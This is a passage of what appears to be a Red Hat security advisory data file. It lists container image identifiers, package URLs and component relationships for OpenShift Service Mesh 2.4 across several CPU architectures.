"openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", product_id: "openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.65.16-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.4.11-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", product_id: "openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", product: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", product_id: "openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", product_identification_helper: { purl: "pkg:oci/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8&tag=2.4.11-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.4.11-2", }, }, }, ], category: "architecture", name: "ppc64le", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", product_id: "openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", product_id: "openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.65.16-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.4.11-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", product_id: "openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", product: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", product_id: "openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", product_identification_helper: { purl: "pkg:oci/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8&tag=2.4.11-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.4.11-2", }, }, }, ], category: "architecture", name: "s390x", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", product_id: "openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", product_id: "openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.65.16-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.4.11-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", product_id: "openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", product: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", product_id: "openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", product_identification_helper: { purl: "pkg:oci/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8&tag=2.4.11-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.4.11-2", }, }, }, ], category: "architecture", name: "amd64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", }, product_reference: "openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", }, product_reference: "openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", }, product_reference: "openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", }, product_reference: "openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", }, product_reference: 